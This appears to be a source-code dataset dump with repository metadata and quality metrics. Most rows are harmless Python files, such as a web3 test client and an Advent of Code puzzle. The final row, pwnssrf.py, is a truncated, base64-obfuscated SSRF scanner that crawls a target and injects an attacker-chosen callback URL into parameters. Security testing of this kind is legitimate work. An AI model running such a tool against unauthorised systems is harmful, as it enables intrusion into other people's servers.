hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
843cd21c1958096f67e66defea105ecdd4a5d7e5
| 79
|
py
|
Python
|
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | null | null | null |
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | 2
|
2021-01-01T16:32:42.000Z
|
2021-01-09T16:23:10.000Z
|
utils.py
|
mouseMD/xo_server
|
4c35c713483639c79726a10b5f61c13799f623ac
|
[
"MIT"
] | null | null | null |
from time import time
def current_timestamp() -> int:
return int(time())
| 13.166667
| 31
| 0.683544
| 11
| 79
| 4.818182
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202532
| 79
| 5
| 32
| 15.8
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ffe4a0728dec2205677e5b2160792a51fa038ff2
| 3,098
|
py
|
Python
|
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
client.py
|
qianfei11/InfoContract
|
2e1de04ac92dab42f53d4b1474ceee1b7ebe6783
|
[
"Apache-2.0"
] | null | null | null |
from web3 import Web3
w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:7545"))
if not w3.isConnected():
print('[-] Connected error!')
exit()
w3.eth.defaultAccount = w3.eth.accounts[2]
address = '0x6eAe6059E06DE916039d6027E4E674e240d5E041'
abi = '[{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"fName","type":"string"},{"indexed":false,"internalType":"uint256","name":"age","type":"uint256"}],"name":"Instructor","type":"event"},{"constant":false,"inputs":[{"internalType":"string","name":"_fName","type":"string"},{"internalType":"uint256","name":"_age","type":"uint256"}],"name":"setInfo","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getInfo","outputs":[{"internalType":"string","name":"","type":"string"},{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"}]'
bytecode = '608060405234801561001057600080fd5b506103a8806100206000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c80635a9b0b891461003b5780638262963b146100c2575b600080fd5b61004361016c565b6040518080602001838152602001828103825284818151815260200191508051906020019080838360005b8381101561008657818101518382015260200161006e565b50505050905090810190601f1680156100b35780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b61016a600480360360408110156100d857600080fd5b8101906020810181356401000000008111156100f357600080fd5b82018360208201111561010557600080fd5b8035906020019184600183028401116401000000008311171561012757600080fd5b91908080601f0160208091040260200160405190810160405280939291908181526020018383808284376000920191909152509295505091359250610218915050565b005b6060600080600154818054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156102095780601f106101de57610100808354040283529160200191610209565b820191906000526020600020905b8154815290600101906020018083116101ec57829003601f168201915b50505050509150915091509091565b815161022b9060009060208501906102d8565b50806001819055507f010becc10ca1475887c4ec429def1ccc2e9ea1713fe8b0d4e9a1d009042f6b8e82826040518080602001838152602001828103825284818151815260200191508051906020019080838360005b83811015610299578181015183820152602001610281565b50505050905090810190601f1680156102c65780820380516001836020036101000a031916815260200191505b50935050505060405180910390a15050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061031957805160ff1916838001178555610346565b82800160010185558215610346579182015b8281111561034657825182559160200191906001019061032b565b50610352929150610356565b5090565b61037091905b80821115610352576000815560010161035c565b9056fea265627a7a7231582089d2eea2ed81fdcae3e852c43c869501475a43097a5ec7fe1678ae76b87fde0c64736f6c634300050c0032'
contract = w3.eth.contract(address=address, abi=abi, bytecode=bytecode)
tx_hash = contract.functions.setInfo("assassinq", 21).transact({'from':w3.eth.defaultAccount})
info = contract.caller.getInfo()
print(info)
| 163.052632
| 1,949
| 0.88315
| 131
| 3,098
| 20.862595
| 0.442748
| 0.020124
| 0.024149
| 0.019759
| 0.069155
| 0.05708
| 0.030004
| 0
| 0
| 0
| 0
| 0.609324
| 0.016785
| 3,098
| 18
| 1,950
| 172.111111
| 0.287919
| 0
| 0
| 0
| 0
| 0.076923
| 0.87504
| 0.857604
| 0
| 1
| 0.013562
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.153846
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f238b5a4c127d2ff8f9681bfa9799f05b6fd4ec6
| 25
|
py
|
Python
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 32
|
2015-05-30T04:48:40.000Z
|
2021-08-17T02:33:03.000Z
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 10
|
2015-02-04T20:51:39.000Z
|
2021-11-15T17:47:56.000Z
|
pyrf/units.py
|
thelaly/pyrf
|
52d7e8059dcd5e9dedd6a2a689124372836aae1c
|
[
"BSD-3-Clause"
] | 5
|
2015-01-28T08:36:22.000Z
|
2020-07-02T10:52:47.000Z
|
M = 10.0**6
G = 10.0**9
| 6.25
| 11
| 0.4
| 8
| 25
| 1.25
| 0.75
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 0.28
| 25
| 3
| 12
| 8.333333
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f29763494d868e45a96afc1f87fd15d565721762
| 2,349
|
py
|
Python
|
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
day_9/first_part.py
|
mamad-azimi-jozani/advent-of-code
|
af6d6acbf492279f80dff2cecd0c3983ebf3f734
|
[
"MIT"
] | null | null | null |
import numpy as np
with open('input.txt') as f:
f = [i.strip() for i in f.readlines()]
# print(f)
zero = np.zeros((len(f), len(f[0])))
f = [list(map(int, i)) for i in f]
for i in range(len(f)):
zero[i] = f[i]
adjacent = []
for i in range(len(f)):
for j in range(len(f[0])):
# top_left
if i == 0 and j == 0:
if zero[i][j] < zero[i+1][j] and zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j])
# down_left
if i == len(f)-1 and j == 0:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j]) # top_right
if i == 0 and j == len(f[0])-1:
if zero[i][j] < zero[i+1][j] and zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j]) # down_right
if i == len(f)-1 and j == len(f[0])-1:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j])
# corner_column_left without last and first
if 1 <= i <= len(f)-2 and j == 0:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
if zero[i][j] < zero[i][j+1]:
adjacent.append(zero[i][j])
# corner_column_right without last and first
if 1 <= i <= len(f)-2 and j == len(f[0])-1:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
if zero[i][j] < zero[i][j-1]:
adjacent.append(zero[i][j])
# top_row without last and first
if i == 0 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1] and zero[i][j] < zero[i+1][j]:
adjacent.append(zero[i][j])
#down_row without last and first
if i == len(f)-1 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1]:
if zero[i][j] < zero[i-1][j]:
adjacent.append(zero[i][j])
# other
if 1 <= i <= len(f)-2 and 1 <= j <= len(f[0])-2:
if zero[i][j] < zero[i][j-1] and zero[i][j] < zero[i][j+1]:
if zero[i][j] < zero[i-1][j] and zero[i][j] < zero[i+1][j]:
adjacent.append(zero[i][j])
print(sum(adjacent)+len(adjacent))
| 23.49
| 101
| 0.447424
| 428
| 2,349
| 2.432243
| 0.098131
| 0.278578
| 0.259366
| 0.230548
| 0.81172
| 0.804035
| 0.766571
| 0.694525
| 0.694525
| 0.694525
| 0
| 0.036082
| 0.339293
| 2,349
| 99
| 102
| 23.727273
| 0.634665
| 0.085568
| 0
| 0.380952
| 0
| 0
| 0.004294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.02381
| 0.02381
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29f118260e927d939bfb0cb943792b5ae4873818
| 42
|
py
|
Python
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 48
|
2022-01-03T11:31:02.000Z
|
2022-03-23T14:16:03.000Z
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 64
|
2022-01-03T13:07:36.000Z
|
2022-03-29T04:35:27.000Z
|
tests/examples/module_ok/__main__.py
|
q0w/slotscheck
|
ec4e8d9925d2c01cbf36aa618b665de0e919672b
|
[
"MIT"
] | 3
|
2022-01-04T18:37:43.000Z
|
2022-02-02T13:46:19.000Z
|
assert "this file should not be imported"
| 21
| 41
| 0.785714
| 7
| 42
| 4.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 1
| 42
| 42
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d99c8a24fb711d3dbb77c59360e58ba4d7ce5619
| 23,678
|
py
|
Python
|
pwnssrf.py
|
kishorehariram/PwnSSRF
|
9bd88dcf8bbcc5abfd102e08e6459de9966824a6
|
[
"MIT"
] | 45
|
2020-09-01T01:04:46.000Z
|
2021-11-08T14:12:06.000Z
|
pwnssrf.py
|
FDlucifer/PwnSSRF
|
00baef96aaa3c188048cceceac29801afb3e5d49
|
[
"MIT"
] | null | null | null |
pwnssrf.py
|
FDlucifer/PwnSSRF
|
00baef96aaa3c188048cceceac29801afb3e5d49
|
[
"MIT"
] | 19
|
2020-09-01T08:58:19.000Z
|
2021-11-01T09:00:04.000Z
|
# Python code obfuscated by pwn0day.com
import base64, codecs
magic = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoKaW1wb3J0IHF1ZXVlCmZyb20gdGhyZWFkaW5nIGltcG9ydCBUaHJlYWQKZnJvbSBiczQgaW1wb3J0IEJlYXV0aWZ1bFNvdXAKZnJvbSB1cmxsaWIucGFyc2UgaW1wb3J0IHVybHBhcnNlCmltcG9ydCBzeXMKaW1wb3J0IHJlCmZyb20gYXJncGFyc2UgaW1wb3J0IEFyZ3VtZW50UGFyc2VyCmltcG9ydCByZXF1ZXN0cwppbXBvcnQgYmFzZTY0LCB4bWwuZXRyZWUuRWxlbWVudFRyZWUKaW1wb3J0IHVybGxpYgppbXBvcnQganNvbgoKYmFubmVyPSIiIgrilZTilZDilZfilKwg4pSs4pSM4pSQ4pSM4pWU4pWQ4pWX4pWU4pWQ4pWX4pWm4pWQ4pWX4pWU4pWQ4pWXCuKVoOKVkOKVneKUguKUguKUguKUguKUguKUguKVmuKVkOKVl+KVmuKVkOKVl+KVoOKVpuKVneKVoOKVoyAK4pWpICDilJTilLTilJjilJjilJTilJjilZrilZDilZ3ilZrilZDilZ3ilanilZrilZDilZogIAoiIiIKCnByaW50KGJhbm5lcikKCnBhcnNlciA9IEFyZ3VtZW50UGFyc2VyKCkKcGFyc2VyLmFkZF9hcmd1bWVudCgiLUgiLCAiLS1ob3N0IiwgZGVzdD0iaG9zdCIsIG1ldGF2YXI9IkhPU1QiLCByZXF1aXJlZD1UcnVlKQpwYXJzZXIuYWRkX2FyZ3VtZW50KCItdCIsICItLXRocmVhZHMiLCBkZXN0PSJ0aHJlYWRzIiwgbWV0YXZhcj0iVEhSRUFEUyIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1jIiwiLS1jb29raWVzIiwgbmFyZ3M9JysnLCBkZXN0PSJjb29raWVzIiwgbWV0YXZhcj0iQ09PS0lFUyIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi12IiwiLS12ZXJib3NlIiwgZGVzdD0idmVyYm9zZSIsIGFjdGlvbj0nc3RvcmVfdHJ1ZScpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1wIiwiLS1wYXlsb2FkIiwgZGVzdD0icGF5bG9hZCIpCnBhcnNlci5hZGRfYXJndW1lbnQoIi1iIiwgIi0tYnVycCIsZGVzdD0iYnVycCIsaGVscD0icHJvdmlkZSBhIGJ1cnAgZmlsZSIsIGFjdGlvbj0ic3RvcmUiKQoKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKCnZhbGlkYXRlSG9zdF9yZWdleD0iXihodHRwOlwvXC93d3dcLnxodHRwczpcL1wvd3d3XC58aHR0cDpcL1wvfGh0dHBzOlwvXC8pW2EtejAtOV0rKFtcLVwuXXsxfVthLXowLTldKykqXC5bYS16XXsyLDV9KDpbMC05XXsxLDV9KT8oXC8uKik/JCIKdmFsaWRhdGVIb3N0SXBXaXRoUG9ydF9yZWdleD0iXmh0dHBzPzpcL1wvKChbMC05XXxbMS05XVswLTldfDFbMC05XXsyfXwyWzAtNF1bMC05XXwyNVswLTVdKVwuKXszfShbMC05XXxbMS05XVswLTldfDFbMC05XXsyfXwyWzAtNF1bMC05XXwyNVswLTVdKT86P1swLTldKyQiCgojVmFsaWRhdGluZyBIb3N0IG5hbWUKaWYgbm90KHJlLm1hdGNoKHZhbGlkYXRlSG9zdF9yZWdleCxhcmdzLmhvc3QpIG9yIHJlLm1hdGNoKHZhbGlkYXRlSG9zdElwV2l0aFBvcnRfcmVnZXgsYXJncy5ob3N0KSk6CiAgICBwcmludCAoIlRlcm1pbmF0aW5nLi4uIFBsZWFzZSBlbnRlciBIb3N0IGluIHRoZSBmb3JtYXQgaHR0cDovL2dvb2dsZS5jb20gb3IgaHR
0cHM6Ly9nb29nbGUuY29tIG9yIGh0dHA6Ly8xMC4xMC4xMC4xMCBmb3IgaW50ZXJuYWwgaG9zdHMiKQogICAgc3lzLmV4aXQoKQoKaWYgYXJncy5wYXlsb2FkIGFuZCBub3QgcmUubWF0Y2godmFsaWRhdGVIb3N0X3JlZ2V4LGFyZ3MucGF5bG9hZCkgYW5kIG5vdCByZS5tYXRjaCh2YWxpZGF0ZUhvc3RJcFdpdGhQb3J0X3JlZ2V4LGFyZ3MucGF5bG9hZCk6CiAgICAgICAgcHJpbnQgKCJUZXJtaW5hdGluZy4uLiBQbGVhc2UgZW50ZXIgSG9zdCBpbiB0aGUgZm9ybWF0IGh0dHA6Ly9nb29nbGUuY29tIG9yIGh0dHA6Ly8xOTIuMTY4LjEuMTo4MCIpCiAgICAgICAgc3lzLmV4aXQoKQoKI0tlZXBzIGEgcmVjb3JkIG9mIGxpbmtzIHdoaWNoIGFyZSBhbHJlYWR5IHNhdmVkIGFuZCBhcmUgcHJlc2VudCBqdXN0IG9uY2UgaW4gdGhlIHF1ZXVlCmxpbmtzVmlzaXRlZD1zZXQoKQpzc3JmVnVsPXNldCgpCgojVGhyb3cgYXdheSBsaXN0IGp1c3QgdXNlZCBmb3IgaWdub3JpbmcgdW5uZWNlc3NhcnkgY3Jhd2xpbmcgYW5kIGdlbmVyYXRpbmcgbm9pc3kgb3V0cHV0CnRocm93QXdheUxpc3RGb3JSZXN0PXNldCgpCnRocm93QXdheUdldFJlcXM9e30KCiNJZ25vcmUgdGhlIHBhdGggd2hpY2ggd2UgY291bGRuJ3QgYmUgY3Jhd2xlZAppZ25vcmVMaXN0PVsicGRmIiwibWFpbHRvIiwiamF2YXNjcmlwdCJdCgojTGlzdCBjb250YWluaW5nIGtleXdvcmRzIHRvIGxvb2sgZm9yIGluIHBvc3QgcGFyYW0gbmFtZSBhdHRyaWJ1dGVzIGFuZCBpbiBnZXQgcGFyYW1ldGVycwptYXRjaExpc3Q9Iih1cmx8d2VifHNpdGV8dXJpKSIKCiNDb29raWVzIHRvIHNlbmQgYWxvbmcgd2l0aCBlYWNoIHJlcXVlc3RzCmNvb2tpZXNEaWN0PXt9CmlmIGFyZ3MuY29va2llczoKCWZvciBjb29rIGluIGFyZ3MuY29va2llczoKCQljb29raWVzRGljdFtjb29rWzpjb29rLmZpbmQoIj0iKV1dPWNvb2tbY29vay5maW5kKCI9IikrMTpdCgojTWFraW5nIGFuIGV4dGVybmFsIHJlcXVlc3QgdG8gYSBob3N0bmFtZSB0aHJvdWdoIHRoZSBwb3RlbnRpYWwgdnVsbmVyYWJsZSBwYXJhbWV0ZXIgdG8gdmFsaWRhdGUgU1NSRgpkZWYgbWFraW5nRXh0ZXJuYWxSZXF1ZXN0cyhwYXJhbU5hbWUsIHVybCk6CglyZWdleFRvUmVwbGFjZT1wYXJhbU5hbWUrIj0oLio/KSg/OiZ8JCkiCglwYXJhbWV0ZXJWYWx1ZXRvUmVwbGFjZT1yZS5zZWFyY2gocmVnZXhUb1JlcGxhY2UsdXJsKS5ncm91cCgxKQoKCSNBZGRpbmcgcGFyYW1uYW1lICdhcmdzLnBheWxvYWQrIi8iK3BhcmFtTmFtZSwnIGF0IHRoZSBlbmQgb2YgYnVycCBjb2xsYWJvcmF0b3IgdXJsIHRvIGRpZmZlcmVudGlhdGUgd2hpY2ggcGFyYW0gc3VjY2VlZGVkIHRvIG1ha2UgZXh0ZXJuYWwgcmVxdWVzdC4KCWZvcm1pbmdQYXlsb2FkVVJMPXJlLnN1YihwYXJhbWV0ZXJWYWx1ZXRvUmVwbGFjZSxhcmdzLnBheWxvYWQrIi8iK3BhcmFtTmFtZSx1cmwpCglwcmludCAoIlwwMzNbOTFtWytdIE1ha2luZyBleHRlcm5hbCByZXF1ZXN0IHdpdGggdGh
lIHBvdGVudGlhbCB2dWxuZXJhYmxlIHVybDoiK2Zvcm1pbmdQYXlsb2FkVVJMKQoJcmVxdWVzdHMuZ2V0KGZvcm1pbmdQYXlsb2FkVVJMKQoKI1RoaXMgY2hlY2tzIGFnYWluc3QgVVJMIGtleXdvcmRzIGluIHBhcmFtIE5BTUUKZGVmIG1hdGNoVVJMS2V5d29yZHNJbk5hbWUoZ2V0T3JGb3JtLHBhcmFtTmFtZSx1cmwpOgoJaWYgYXJncy52ZXJib3NlOgoJCXRlbXA9dXJsKyI6cGFyYW1uYW1lOiIrcGFyYW1OYW1lCgllbHNlOgoJCXRlbXA9cGFyYW1OYW1lCglpZiB0ZW1wIG5vdCBpbiBzc3JmVnVsIGFuZCByZS5zZWFyY2gobWF0Y2hMaXN0LHBhcmFtTmFtZSxyZS5JKToKCQlwcmludCAoIlwwMzNbOTJtWy1dIFBvdGVudGlhbCB2dWxuZXJhYmxlICd7fScgcGFyYW1ldGVyIHt9ICd7fScgYXQgJ3t9JyIuZm9ybWF0KGdldE9yRm9ybSwiTmFtZSIscGFyYW1OYW1lLHVybCkpCgkJc3NyZlZ1bC5hZGQodGVtcCkKCQkjVHJ5aW5nIHRvIG1ha2UgYW4gZXh0ZXJuYWwgcmVxdWVzdCB0byB2YWxpZGF0ZSBwb3RlbnRpYWwgU1NSRiAoT25seSBmb3IgR0VUIHBhcmFtZXRlciBmb3Igbm93KSAJCgkJaWYgYXJncy5wYXlsb2FkIGFuZCBnZXRPckZvcm0gPT0gIkdFVCI6CgkJCW1ha2luZ0V4dGVybmFsUmVxdWVzdHMocGFyYW1OYW1lLHVybCkKCiNUaGlzIGNoZWNrcyBVUkwgcGF0dGVybiBpbiBwYXJhbSBWQUxVRSBhbmQgYWxzbyBpZiBhbiBJUCBpcyBwYXNzZWQgc29tZXdoZXJlIGluIHRoZSB2YWx1ZXMKZGVmIG1hdGNoVVJMUGF0dGVybkluVmFsdWUoZ2V0T3JGb3JtLCBwYXJhbU5hbWUscGFyYW1WYWx1ZXMsdXJsKToKCSNTaW5jZSBhbGwgZmllbGRzIGRpZG4ndCBoYXZlIHBhcmFtTmFtZXMgaGVuY2UgdGhpcyBjb25kaXRpb24KCWlmIGFyZ3MudmVyYm9zZToKCQl0ZW1wPXVybCsiOnBhcmFtbmFtZToiK3BhcmFtVmFsdWVzIGlmIHBhcmFtTmFtZT09IiIgZWxzZSB1cmwrIjpwYXJhbW5hbWU6IitwYXJhbU5hbWUKCWVsc2U6CgkJdGVtcD1wYXJhbVZhbHVlcyBpZiBwYXJhbU5hbWU9PSIiIGVsc2UgcGFyYW1OYW1lCiAgICAgICAgICAgICAgICAKCWlmIHRlbXAgbm90IGluIHNzcmZWdWwgYW5kIChyZS5tYXRjaCgiXihodHRwOlwvXC93d3dcLnxodHRwczpcL1wvd3d3XC58aHR0cDpcL1wvfGh0dHBzOlwvXC8pP1thLXowLTldKyhbXC1cLl17MX1bYS16MC05XSspKlwuW2Etel17Miw1fSg6WzAtOV17MSw1fSk/KFwvLiopPyQiLHBhcmFtVmFsdWVzKSBvciByZS5tYXRjaCgiKCgyNVswLTVdfDJbMC00XVswLTldfFswMV0/WzAtOV1bMC05XT8pKFwufCQpKXs0fSIscGFyYW1WYWx1ZXMpKToKCQlwcmludCAoIlwwMzNbOTJtWy1dIFBvdGVudGlhbCB2dWxuZXJhYmxlICd7fScgcGFyYW1ldG'
